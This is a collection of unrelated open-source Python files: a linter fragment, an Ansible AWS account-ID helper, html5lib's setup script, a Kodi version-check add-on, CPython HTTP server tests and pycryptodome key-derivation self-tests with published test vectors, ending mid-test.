"""Checks to make sure the file has no tab characters.
Args:
filename: the file under consideration as string
lines: contents of the file as string array
Returns:
A list of tuples with format [(line_number, msg), ...] with any violations
found.
"""
lint = []
tab_re = re.compile(r'\t')
line_num = 1
for line in lines:
if tab_re.match(line.rstrip('\n')):
lint.append((filename, line_num, 'Tab found instead of whitespace'))
line_num += 1
return lint
def VerifyTrailingWhitespace(filename, lines):
"""Checks to make sure the file has no lines with trailing whitespace.
Args:
filename: the file under consideration as string
lines: contents of the file as string array
Returns:
A list of tuples with format [(filename, line number, msg), ...] with any
violations found.
"""
lint = []
trailing_whitespace_re = re.compile(r'\s+$')
line_num = 1
for line in lines:
if trailing_whitespace_re.match(line.rstrip('\n')):
lint.append((filename, line_num, 'Trailing whitespace'))
line_num += 1
return lint
class BaseLint:
def RunOnFile(self, filename, lines):
raise Exception('RunOnFile() unimplemented')
def RunLintOverAllFiles(linter, filenames):
"""Runs linter over the contents of all files.
Args:
lint: subclass of BaseLint, implementing RunOnFile()
filenames: list of all files whose contents will be linted
Returns:
A list of tuples with format [(filename, line number, msg), ...] with any
violations found.
"""
lint = []
for filename in filenames:
file = open(filename, 'r')
if not file:
print 'Could not open %s' % filename
continue
lines = file.readlines()
lint.extend(linter.RunOnFile(filename, lines))
return lint
| lgpl-2.1 |
toshywoshy/ansible | lib/ansible/module_utils/aws/iam.py | 60 | 2118 | # Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import traceback
try:
from botocore.exceptions import ClientError, NoCredentialsError
except ImportError:
pass # caught by HAS_BOTO3
from ansible.module_utils._text import to_native
def get_aws_account_id(module):
""" Given AnsibleAWSModule instance, get the active AWS account ID
get_account_id tries too find out the account that we are working
on. It's not guaranteed that this will be easy so we try in
several different ways. Giving either IAM or STS privilages to
the account should be enough to permit this.
"""
account_id = None
try:
sts_client = module.client('sts')
account_id = sts_client.get_caller_identity().get('Account')
# non-STS sessions may also get NoCredentialsError from this STS call, so
# we must catch that too and try the IAM version
except (ClientError, NoCredentialsError):
try:
iam_client = module.client('iam')
account_id = iam_client.get_user()['User']['Arn'].split(':')[4]
except ClientError as e:
if (e.response['Error']['Code'] == 'AccessDenied'):
except_msg = to_native(e)
# don't match on `arn:aws` because of China region `arn:aws-cn` and similar
account_id = re.search(r"arn:\w+:iam::([0-9]{12,32}):\w+/", except_msg).group(1)
if account_id is None:
module.fail_json_aws(e, msg="Could not get AWS account information")
except Exception as e:
module.fail_json(
msg="Failed to get AWS account information, Try allowing sts:GetCallerIdentity or iam:GetUser permissions.",
exception=traceback.format_exc()
)
if not account_id:
module.fail_json(msg="Failed while determining AWS account ID. Try allowing sts:GetCallerIdentity or iam:GetUser permissions.")
return to_native(account_id)
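# Illustrative call site (a sketch; AnsibleAWSModule is constructed by the
# calling module, not defined in this file):
#
# module = AnsibleAWSModule(argument_spec=dict())
# account_id = get_aws_account_id(module)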
| gpl-3.0 |
GreenRecycleBin/servo | tests/wpt/web-platform-tests/tools/html5lib/setup.py | 418 | 1694 | from distutils.core import setup
import os
import codecs
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Text Processing :: Markup :: HTML'
]
packages = ['html5lib'] + ['html5lib.'+name
for name in os.listdir(os.path.join('html5lib'))
if os.path.isdir(os.path.join('html5lib', name)) and
not name.startswith('.') and name != 'tests']
current_dir = os.path.dirname(__file__)
with codecs.open(os.path.join(current_dir, 'README.rst'), 'r', 'utf8') as readme_file:
with codecs.open(os.path.join(current_dir, 'CHANGES.rst'), 'r', 'utf8') as changes_file:
long_description = readme_file.read() + '\n' + changes_file.read()
setup(name='html5lib',
version='0.9999-dev',
url='https://github.com/html5lib/html5lib-python',
license="MIT License",
description='HTML parser based on the WHATWG HTML specification',
long_description=long_description,
classifiers=classifiers,
maintainer='James Graham',
maintainer_email='[email protected]',
packages=packages,
install_requires=[
'six',
],
)
| mpl-2.0 |
chadoe/xbmc | addons/service.xbmc.versioncheck/service.py | 58 | 3959 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import platform
import sys
import xbmc
import lib.common
from lib.common import log, dialog_yesno
from lib.common import upgrade_message as _upgrademessage
from lib.common import upgrade_message2 as _upgrademessage2
ADDON = lib.common.ADDON
ADDONVERSION = lib.common.ADDONVERSION
ADDONNAME = lib.common.ADDONNAME
ADDONPATH = lib.common.ADDONPATH
ICON = lib.common.ICON
oldversion = False
class Main:
def __init__(self):
linux = False
packages = []
xbmc.sleep(5000)
if xbmc.getCondVisibility('System.Platform.Linux') and ADDON.getSetting("upgrade_apt") == 'true':
packages = ['kodi']
_versionchecklinux(packages)
else:
oldversion, version_installed, version_available, version_stable = _versioncheck()
if oldversion:
_upgrademessage2( version_installed, version_available, version_stable, oldversion, False)
def _versioncheck():
# initial vars
from lib.jsoninterface import get_installedversion, get_versionfilelist
from lib.versions import compare_version
# retrieve versionlists from supplied version file
versionlist = get_versionfilelist()
# retrieve version installed
version_installed = get_installedversion()
# compare installed and available
oldversion, version_installed, version_available, version_stable = compare_version(version_installed, versionlist)
return oldversion, version_installed, version_available, version_stable
def _versionchecklinux(packages):
if platform.dist()[0].lower() in ['ubuntu', 'debian', 'linuxmint']:
handler = False
result = False
try:
# try aptdeamon first
from lib.aptdeamonhandler import AptdeamonHandler
handler = AptdeamonHandler()
except:
# fallback to shell
# since we need the user password, ask to check for new version first
from lib.shellhandlerapt import ShellHandlerApt
sudo = True
handler = ShellHandlerApt(sudo)
if dialog_yesno(32015):
pass
elif dialog_yesno(32009, 32010):
log("disabling addon by user request")
ADDON.setSetting("versioncheck_enable", 'false')
return
if handler:
if handler.check_upgrade_available(packages[0]):
if _upgrademessage(32012, oldversion, True):
if ADDON.getSetting("upgrade_system") == "false":
result = handler.upgrade_package(packages[0])
else:
result = handler.upgrade_system()
if result:
from lib.common import message_upgrade_success, message_restart
message_upgrade_success()
message_restart()
else:
log("Error during upgrade")
else:
log("Error: no handler found")
else:
log("Unsupported platform %s" %platform.dist()[0])
sys.exit(0)
if (__name__ == "__main__"):
log('Version %s started' % ADDONVERSION)
Main()
| gpl-2.0 |
mancoast/CPythonPyc_test | fail/300_test_httpservers.py | 3 | 11640 | """Unittests for the various HTTPServer modules.
Written by Cody A.W. Somerville <[email protected]>,
Josip Dzolonga, and Michael Otteneder for the 2007/08 GHOP contest.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer, \
SimpleHTTPRequestHandler, CGIHTTPRequestHandler
import os
import sys
import base64
import shutil
import urllib.parse
import http.client
import tempfile
import threading
import unittest
from test import support
class NoLogRequestHandler:
def log_message(self, *args):
# don't write log messages to stderr
pass
def read(self, n=None):
return ''
class TestServerThread(threading.Thread):
def __init__(self, test_object, request_handler):
threading.Thread.__init__(self)
self.request_handler = request_handler
self.test_object = test_object
self.test_object.lock.acquire()
def run(self):
self.server = HTTPServer(('', 0), self.request_handler)
self.test_object.PORT = self.server.socket.getsockname()[1]
self.test_object.lock.release()
try:
self.server.serve_forever()
finally:
self.server.server_close()
def stop(self):
self.server.shutdown()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self.lock = threading.Lock()
self.thread = TestServerThread(self, self.request_handler)
self.thread.start()
self.lock.acquire()
def tearDown(self):
self.lock.release()
self.thread.stop()
def request(self, uri, method='GET', body=None, headers={}):
self.connection = http.client.HTTPConnection('localhost', self.PORT)
self.connection.request(method, uri, body, headers)
return self.connection.getresponse()
class BaseHTTPServerTestCase(BaseTestCase):
class request_handler(NoLogRequestHandler, BaseHTTPRequestHandler):
protocol_version = 'HTTP/1.1'
default_request_version = 'HTTP/1.1'
def do_TEST(self):
self.send_response(204)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'close')
self.end_headers()
def do_KEEP(self):
self.send_response(204)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'keep-alive')
self.end_headers()
def do_KEYERROR(self):
self.send_error(999)
def do_CUSTOM(self):
self.send_response(999)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'close')
self.end_headers()
def setUp(self):
BaseTestCase.setUp(self)
self.con = http.client.HTTPConnection('localhost', self.PORT)
self.con.connect()
def test_command(self):
self.con.request('GET', '/')
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_request_line_trimming(self):
self.con._http_vsn_str = 'HTTP/1.1\n'
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_version_bogus(self):
self.con._http_vsn_str = 'FUBAR'
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 400)
def test_version_digits(self):
self.con._http_vsn_str = 'HTTP/9.9.9'
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 400)
def test_version_none_get(self):
self.con._http_vsn_str = ''
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_version_none(self):
self.con._http_vsn_str = ''
self.con.putrequest('PUT', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 400)
def test_version_invalid(self):
self.con._http_vsn = 99
self.con._http_vsn_str = 'HTTP/9.9'
self.con.putrequest('GET', '/')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 505)
def test_send_blank(self):
self.con._http_vsn_str = ''
self.con.putrequest('', '')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 400)
def test_header_close(self):
self.con.putrequest('GET', '/')
self.con.putheader('Connection', 'close')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_head_keep_alive(self):
self.con._http_vsn_str = 'HTTP/1.1'
self.con.putrequest('GET', '/')
self.con.putheader('Connection', 'keep-alive')
self.con.endheaders()
res = self.con.getresponse()
self.assertEquals(res.status, 501)
def test_handler(self):
self.con.request('TEST', '/')
res = self.con.getresponse()
self.assertEquals(res.status, 204)
def test_return_header_keep_alive(self):
self.con.request('KEEP', '/')
res = self.con.getresponse()
self.assertEquals(res.getheader('Connection'), 'keep-alive')
self.con.request('TEST', '/')
def test_internal_key_error(self):
self.con.request('KEYERROR', '/')
res = self.con.getresponse()
self.assertEquals(res.status, 999)
def test_return_custom_status(self):
self.con.request('CUSTOM', '/')
res = self.con.getresponse()
self.assertEquals(res.status, 999)
class SimpleHTTPServerTestCase(BaseTestCase):
class request_handler(NoLogRequestHandler, SimpleHTTPRequestHandler):
pass
def setUp(self):
BaseTestCase.setUp(self)
self.cwd = os.getcwd()
basetempdir = tempfile.gettempdir()
os.chdir(basetempdir)
self.data = b'We are the knights who say Ni!'
self.tempdir = tempfile.mkdtemp(dir=basetempdir)
self.tempdir_name = os.path.basename(self.tempdir)
temp = open(os.path.join(self.tempdir, 'test'), 'wb')
temp.write(self.data)
temp.close()
def tearDown(self):
try:
os.chdir(self.cwd)
try:
shutil.rmtree(self.tempdir)
except:
pass
finally:
BaseTestCase.tearDown(self)
def check_status_and_reason(self, response, status, data=None):
body = response.read()
self.assert_(response)
self.assertEquals(response.status, status)
self.assert_(response.reason != None)
if data:
self.assertEqual(data, body)
def test_get(self):
#constructs the path relative to the root directory of the HTTPServer
response = self.request(self.tempdir_name + '/test')
self.check_status_and_reason(response, 200, data=self.data)
response = self.request(self.tempdir_name + '/')
self.check_status_and_reason(response, 200)
response = self.request(self.tempdir_name)
self.check_status_and_reason(response, 301)
response = self.request('/ThisDoesNotExist')
self.check_status_and_reason(response, 404)
response = self.request('/' + 'ThisDoesNotExist' + '/')
self.check_status_and_reason(response, 404)
f = open(os.path.join(self.tempdir_name, 'index.html'), 'w')
response = self.request('/' + self.tempdir_name + '/')
self.check_status_and_reason(response, 200)
if os.name == 'posix':
# chmod won't work as expected on Windows platforms
os.chmod(self.tempdir, 0)
response = self.request(self.tempdir_name + '/')
self.check_status_and_reason(response, 404)
os.chmod(self.tempdir, 0o755)
def test_head(self):
response = self.request(
self.tempdir_name + '/test', method='HEAD')
self.check_status_and_reason(response, 200)
self.assertEqual(response.getheader('content-length'),
str(len(self.data)))
self.assertEqual(response.getheader('content-type'),
'application/octet-stream')
def test_invalid_requests(self):
response = self.request('/', method='FOO')
self.check_status_and_reason(response, 501)
# requests must be case sensitive, so this should fail too
response = self.request('/', method='get')
self.check_status_and_reason(response, 501)
response = self.request('/', method='GETs')
self.check_status_and_reason(response, 501)
cgi_file1 = """\
#!%s
print("Content-type: text/html")
print()
print("Hello World")
"""
cgi_file2 = """\
#!%s
import cgi
print("Content-type: text/html")
print()
form = cgi.FieldStorage()
print("%%s, %%s, %%s" %% (form.getfirst("spam"), form.getfirst("eggs"),\
form.getfirst("bacon")))
"""
class CGIHTTPServerTestCase(BaseTestCase):
class request_handler(NoLogRequestHandler, CGIHTTPRequestHandler):
pass
def setUp(self):
BaseTestCase.setUp(self)
self.parent_dir = tempfile.mkdtemp()
self.cgi_dir = os.path.join(self.parent_dir, 'cgi-bin')
os.mkdir(self.cgi_dir)
self.file1_path = os.path.join(self.cgi_dir, 'file1.py')
with open(self.file1_path, 'w') as file1:
file1.write(cgi_file1 % sys.executable)
os.chmod(self.file1_path, 0o777)
self.file2_path = os.path.join(self.cgi_dir, 'file2.py')
with open(self.file2_path, 'w') as file2:
file2.write(cgi_file2 % sys.executable)
os.chmod(self.file2_path, 0o777)
self.cwd = os.getcwd()
os.chdir(self.parent_dir)
def tearDown(self):
try:
os.chdir(self.cwd)
os.remove(self.file1_path)
os.remove(self.file2_path)
os.rmdir(self.cgi_dir)
os.rmdir(self.parent_dir)
finally:
BaseTestCase.tearDown(self)
def test_headers_and_content(self):
res = self.request('/cgi-bin/file1.py')
self.assertEquals((b'Hello World\n', 'text/html', 200), \
(res.read(), res.getheader('Content-type'), res.status))
def test_post(self):
params = urllib.parse.urlencode(
{'spam' : 1, 'eggs' : 'python', 'bacon' : 123456})
headers = {'Content-type' : 'application/x-www-form-urlencoded'}
res = self.request('/cgi-bin/file2.py', 'POST', params, headers)
self.assertEquals(res.read(), b'1, python, 123456\n')
def test_invaliduri(self):
res = self.request('/cgi-bin/invalid')
res.read()
self.assertEquals(res.status, 404)
def test_authorization(self):
headers = {b'Authorization' : b'Basic ' +
base64.b64encode(b'username:pass')}
res = self.request('/cgi-bin/file1.py', 'GET', headers=headers)
self.assertEquals((b'Hello World\n', 'text/html', 200), \
(res.read(), res.getheader('Content-type'), res.status))
def test_main(verbose=None):
try:
cwd = os.getcwd()
support.run_unittest(BaseHTTPServerTestCase,
SimpleHTTPServerTestCase,
CGIHTTPServerTestCase
)
finally:
os.chdir(cwd)
if __name__ == '__main__':
test_main()
| gpl-3.0 |
mrquim/repository.mrquim | repo/script.module.pycryptodome/lib/Crypto/SelfTest/Protocol/test_KDF.py | 5 | 16508 | # -*- coding: utf-8 -*-
#
# SelfTest/Protocol/test_KDF.py: Self-test for key derivation functions
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
import unittest
from binascii import unhexlify
from Crypto.Util.py3compat import *
from Crypto.SelfTest.st_common import list_test_cases
from Crypto.Hash import SHA1, HMAC, SHA256
from Crypto.Cipher import AES, DES3
from Crypto.Protocol.KDF import PBKDF1, PBKDF2, _S2V, HKDF, scrypt
def t2b(t):
if t is None:
return None
t2 = t.replace(" ", "").replace("\n", "")
return unhexlify(b(t2))
class TestVector(object):
pass
class PBKDF1_Tests(unittest.TestCase):
# List of tuples with test data.
# Each tuple is made up by:
# Item #0: a pass phrase
# Item #1: salt (8 bytes encoded in hex)
# Item #2: output key length
# Item #3: iterations to use
# Item #4: expected result (encoded in hex)
_testData = (
# From http://www.di-mgt.com.au/cryptoKDFs.html#examplespbkdf
("password","78578E5A5D63CB06",16,1000,"DC19847E05C64D2FAF10EBFB4A3D2A20"),
)
def test1(self):
v = self._testData[0]
res = PBKDF1(v[0], t2b(v[1]), v[2], v[3], SHA1)
self.assertEqual(res, t2b(v[4]))
class PBKDF2_Tests(unittest.TestCase):
# List of tuples with test data.
# Each tuple is made up by:
# Item #0: a pass phrase
# Item #1: salt (encoded in hex)
# Item #2: output key length
# Item #3: iterations to use
# Item #4: expected result (encoded in hex)
_testData = (
# From http://www.di-mgt.com.au/cryptoKDFs.html#examplespbkdf
("password","78578E5A5D63CB06",24,2048,"BFDE6BE94DF7E11DD409BCE20A0255EC327CB936FFE93643"),
# From RFC 6050
("password","73616c74", 20, 1, "0c60c80f961f0e71f3a9b524af6012062fe037a6"),
("password","73616c74", 20, 2, "ea6c014dc72d6f8ccd1ed92ace1d41f0d8de8957"),
("password","73616c74", 20, 4096, "4b007901b765489abead49d926f721d065a429c1"),
("passwordPASSWORDpassword","73616c7453414c5473616c7453414c5473616c7453414c5473616c7453414c5473616c74",
25, 4096, "3d2eec4fe41c849b80c8d83662c0e44a8b291a964cf2f07038"),
( 'pass\x00word',"7361006c74",16,4096, "56fa6aa75548099dcc37d7f03425e0c3"),
)
def test1(self):
# Test only for HMAC-SHA1 as PRF
def prf(p,s):
return HMAC.new(p,s,SHA1).digest()
for i in xrange(len(self._testData)):
v = self._testData[i]
res = PBKDF2(v[0], t2b(v[1]), v[2], v[3])
res2 = PBKDF2(v[0], t2b(v[1]), v[2], v[3], prf)
self.assertEqual(res, t2b(v[4]))
self.assertEqual(res, res2)
def test2(self):
"""From draft-josefsson-scrypt-kdf-01, Chapter 10"""
output_1 = t2b("""
55 ac 04 6e 56 e3 08 9f ec 16 91 c2 25 44 b6 05
f9 41 85 21 6d de 04 65 e6 8b 9d 57 c2 0d ac bc
49 ca 9c cc f1 79 b6 45 99 16 64 b3 9d 77 ef 31
7c 71 b8 45 b1 e3 0b d5 09 11 20 41 d3 a1 97 83
""")
output_2 = t2b("""
4d dc d8 f6 0b 98 be 21 83 0c ee 5e f2 27 01 f9
64 1a 44 18 d0 4c 04 14 ae ff 08 87 6b 34 ab 56
a1 d4 25 a1 22 58 33 54 9a db 84 1b 51 c9 b3 17
6a 27 2b de bb a1 d0 78 47 8f 62 b3 97 f3 3c 8d
""")
prf_hmac_sha256 = lambda p, s: HMAC.new(p, s, SHA256).digest()
output = PBKDF2(b("passwd"), b("salt"), 64, 1, prf=prf_hmac_sha256)
self.assertEqual(output, output_1)
output = PBKDF2(b("Password"), b("NaCl"), 64, 80000, prf=prf_hmac_sha256)
self.assertEqual(output, output_2)
class S2V_Tests(unittest.TestCase):
# Sequence of test vectors.
# Each test vector is made up by:
# Item #0: a tuple of strings
# Item #1: an AES key
# Item #2: the result
# Item #3: the cipher module S2V is based on
# Everything is hex encoded
_testData = [
# RFC5297, A.1
(
( '101112131415161718191a1b1c1d1e1f2021222324252627',
'112233445566778899aabbccddee' ),
'fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0',
'85632d07c6e8f37f950acd320a2ecc93',
AES
),
# RFC5297, A.2
(
( '00112233445566778899aabbccddeeffdeaddadadeaddadaffeeddcc'+
'bbaa99887766554433221100',
'102030405060708090a0',
'09f911029d74e35bd84156c5635688c0',
'7468697320697320736f6d6520706c61'+
'696e7465787420746f20656e63727970'+
'74207573696e67205349562d414553'),
'7f7e7d7c7b7a79787776757473727170',
'7bdb6e3b432667eb06f4d14bff2fbd0f',
AES
),
]
def test1(self):
"""Verify correctness of test vector"""
for tv in self._testData:
s2v = _S2V.new(t2b(tv[1]), tv[3])
for s in tv[0]:
s2v.update(t2b(s))
result = s2v.derive()
self.assertEqual(result, t2b(tv[2]))
def test2(self):
"""Verify that no more than 127(AES) and 63(TDES)
components are accepted."""
key = bchr(0) * 8 + bchr(255) * 8
for module in (AES, DES3):
s2v = _S2V.new(key, module)
max_comps = module.block_size*8-1
for i in xrange(max_comps):
s2v.update(b("XX"))
self.assertRaises(TypeError, s2v.update, b("YY"))
class HKDF_Tests(unittest.TestCase):
# Test vectors from RFC5869, Appendix A
# Each tuple is made up by:
# Item #0: hash module
# Item #1: secret
# Item #2: salt
# Item #3: context
# Item #4: expected result
_test_vector = (
(
SHA256,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
"000102030405060708090a0b0c",
"f0f1f2f3f4f5f6f7f8f9",
42,
"3cb25f25faacd57a90434f64d0362f2a" +
"2d2d0a90cf1a5a4c5db02d56ecc4c5bf" +
"34007208d5b887185865"
),
(
SHA256,
"000102030405060708090a0b0c0d0e0f" +
"101112131415161718191a1b1c1d1e1f" +
"202122232425262728292a2b2c2d2e2f" +
"303132333435363738393a3b3c3d3e3f" +
"404142434445464748494a4b4c4d4e4f",
"606162636465666768696a6b6c6d6e6f" +
"707172737475767778797a7b7c7d7e7f" +
"808182838485868788898a8b8c8d8e8f" +
"909192939495969798999a9b9c9d9e9f" +
"a0a1a2a3a4a5a6a7a8a9aaabacadaeaf",
"b0b1b2b3b4b5b6b7b8b9babbbcbdbebf" +
"c0c1c2c3c4c5c6c7c8c9cacbcccdcecf" +
"d0d1d2d3d4d5d6d7d8d9dadbdcdddedf" +
"e0e1e2e3e4e5e6e7e8e9eaebecedeeef" +
"f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff",
82,
"b11e398dc80327a1c8e7f78c596a4934" +
"4f012eda2d4efad8a050cc4c19afa97c" +
"59045a99cac7827271cb41c65e590e09" +
"da3275600c2f09b8367793a9aca3db71" +
"cc30c58179ec3e87c14c01d5c1f3434f" +
"1d87"
),
(
SHA256,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
None,
None,
42,
"8da4e775a563c18f715f802a063c5a31" +
"b8a11f5c5ee1879ec3454e5f3c738d2d" +
"9d201395faa4b61a96c8"
),
(
SHA1,
"0b0b0b0b0b0b0b0b0b0b0b",
"000102030405060708090a0b0c",
"f0f1f2f3f4f5f6f7f8f9",
42,
"085a01ea1b10f36933068b56efa5ad81" +
"a4f14b822f5b091568a9cdd4f155fda2" +
"c22e422478d305f3f896"
),
(
SHA1,
"000102030405060708090a0b0c0d0e0f" +
"101112131415161718191a1b1c1d1e1f" +
"202122232425262728292a2b2c2d2e2f" +
"303132333435363738393a3b3c3d3e3f" +
"404142434445464748494a4b4c4d4e4f",
"606162636465666768696a6b6c6d6e6f" +
"707172737475767778797a7b7c7d7e7f" +
"808182838485868788898a8b8c8d8e8f" +
"909192939495969798999a9b9c9d9e9f" +
"a0a1a2a3a4a5a6a7a8a9aaabacadaeaf",
"b0b1b2b3b4b5b6b7b8b9babbbcbdbebf" +
"c0c1c2c3c4c5c6c7c8c9cacbcccdcecf" +
"d0d1d2d3d4d5d6d7d8d9dadbdcdddedf" +
"e0e1e2e3e4e5e6e7e8e9eaebecedeeef" +
"f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff",
82,
"0bd770a74d1160f7c9f12cd5912a06eb" +
"ff6adcae899d92191fe4305673ba2ffe" +
"8fa3f1a4e5ad79f3f334b3b202b2173c" +
"486ea37ce3d397ed034c7f9dfeb15c5e" +
"927336d0441f4c4300e2cff0d0900b52" +
"d3b4"
),
(
SHA1,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
"",
"",
42,
"0ac1af7002b3d761d1e55298da9d0506" +
"b9ae52057220a306e07b6b87e8df21d0" +
"ea00033de03984d34918"
),
(
SHA1,
"0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c",
None,
"",
42,
"2c91117204d745f3500d636a62f64f0a" +
"b3bae548aa53d423b0d1f27ebba6f5e5" +
"673a081d70cce7acfc48"
)
)
def test1(self):
for tv in self._test_vector:
secret, salt, info, exp = [ t2b(tv[x]) for x in (1,2,3,5) ]
key_len, hashmod = [ tv[x] for x in (4,0) ]
output = HKDF(secret, key_len, salt, hashmod, 1, info)
self.assertEqual(output, exp)
def test2(self):
ref = HKDF(b("XXXXXX"), 12, b("YYYY"), SHA1)
# Same output, but this time split over 2 keys
key1, key2 = HKDF(b("XXXXXX"), 6, b("YYYY"), SHA1, 2)
self.assertEqual((ref[:6], ref[6:]), (key1, key2))
# Same output, but this time split over 3 keys
key1, key2, key3 = HKDF(b("XXXXXX"), 4, b("YYYY"), SHA1, 3)
self.assertEqual((ref[:4], ref[4:8], ref[8:]), (key1, key2, key3))
class scrypt_Tests(unittest.TestCase):
# Test vectors taken from
# http://tools.ietf.org/html/draft-josefsson-scrypt-kdf-00
data = (
(
"",
"",
16, # 2K
1,
1,
"""
77 d6 57 62 38 65 7b 20 3b 19 ca 42 c1 8a 04 97
f1 6b 48 44 e3 07 4a e8 df df fa 3f ed e2 14 42
fc d0 06 9d ed 09 48 f8 32 6a 75 3a 0f c8 1f 17
e8 d3 e0 fb 2e 0d 36 28 cf 35 e2 0c 38 d1 89 06
"""
),
(
"password",
"NaCl",
1024, # 1M
8,
16,
"""
fd ba be 1c 9d 34 72 00 78 56 e7 19 0d 01 e9 fe
7c 6a d7 cb c8 23 78 30 e7 73 76 63 4b 37 31 62
2e af 30 d9 2e 22 a3 88 6f f1 09 27 9d 98 30 da
c7 27 af b9 4a 83 ee 6d 83 60 cb df a2 cc 06 40
"""
),
(
"pleaseletmein",
"SodiumChloride",
16384, # 16M
8,
1,
"""
70 23 bd cb 3a fd 73 48 46 1c 06 cd 81 fd 38 eb
fd a8 fb ba 90 4f 8e 3e a9 b5 43 f6 54 5d a1 f2
d5 43 29 55 61 3f 0f cf 62 d4 97 05 24 2a 9a f9
e6 1e 85 dc 0d 65 1e 40 df cf 01 7b 45 57 58 87
"""
),
(
"pleaseletmein",
"SodiumChloride",
1048576, # 1G
8,
1,
"""
21 01 cb 9b 6a 51 1a ae ad db be 09 cf 70 f8 81
ec 56 8d 57 4a 2f fd 4d ab e5 ee 98 20 ad aa 47
8e 56 fd 8f 4b a5 d0 9f fa 1c 6d 92 7c 40 f4 c3
37 30 40 49 e8 a9 52 fb cb f4 5c 6f a7 7a 41 a4
"""
),
)
def setUp(self):
new_test_vectors = []
for tv in self.data:
new_tv = TestVector()
new_tv.P = b(tv[0])
new_tv.S = b(tv[1])
new_tv.N = tv[2]
new_tv.r = tv[3]
new_tv.p = tv[4]
new_tv.output = t2b(tv[5])
new_tv.dkLen = len(new_tv.output)
new_test_vectors.append(new_tv)
self.data = new_test_vectors
def _test1(self):
b_input = t2b("""
f7 ce 0b 65 3d 2d 72 a4 10 8c f5 ab e9 12 ff dd
77 76 16 db bb 27 a7 0e 82 04 f3 ae 2d 0f 6f ad
89 f6 8f 48 11 d1 e8 7b cc 3b d7 40 0a 9f fd 29
09 4f 01 84 63 95 74 f3 9a e5 a1 31 52 17 bc d7
89 49 91 44 72 13 bb 22 6c 25 b5 4d a8 63 70 fb
cd 98 43 80 37 46 66 bb 8f fc b5 bf 40 c2 54 b0
67 d2 7c 51 ce 4a d5 fe d8 29 c9 0b 50 5a 57 1b
7f 4d 1c ad 6a 52 3c da 77 0e 67 bc ea af 7e 89
""")
b_output = t2b("""
79 cc c1 93 62 9d eb ca 04 7f 0b 70 60 4b f6 b6
2c e3 dd 4a 96 26 e3 55 fa fc 61 98 e6 ea 2b 46
d5 84 13 67 3b 99 b0 29 d6 65 c3 57 60 1f b4 26
a0 b2 f4 bb a2 00 ee 9f 0a 43 d1 9b 57 1a 9c 71
ef 11 42 e6 5d 5a 26 6f dd ca 83 2c e5 9f aa 7c
ac 0b 9c f1 be 2b ff ca 30 0d 01 ee 38 76 19 c4
ae 12 fd 44 38 f2 03 a0 e4 e1 c4 7e c3 14 86 1f
4e 90 87 cb 33 39 6a 68 73 e8 f9 d2 53 9a 4b 8e
""")
from Crypto.Protocol.KDF import _scryptROMix
output = _scryptROMix(b_input, 16)
self.assertEqual(output, b_output)
def test2(self):
for tv in self.data:
# TODO: add runtime flag to enable test vectors
# with humongous memory usage
if tv.N > 100000:
continue
output = scrypt(tv.P, tv.S, tv.dkLen, tv.N, tv.r, tv.p)
self.assertEqual(output, tv.output)
def test3(self):
ref = scrypt(b("password"), b("salt"), 12, 16, 1, 1)
# Same output, but this time split over 2 keys
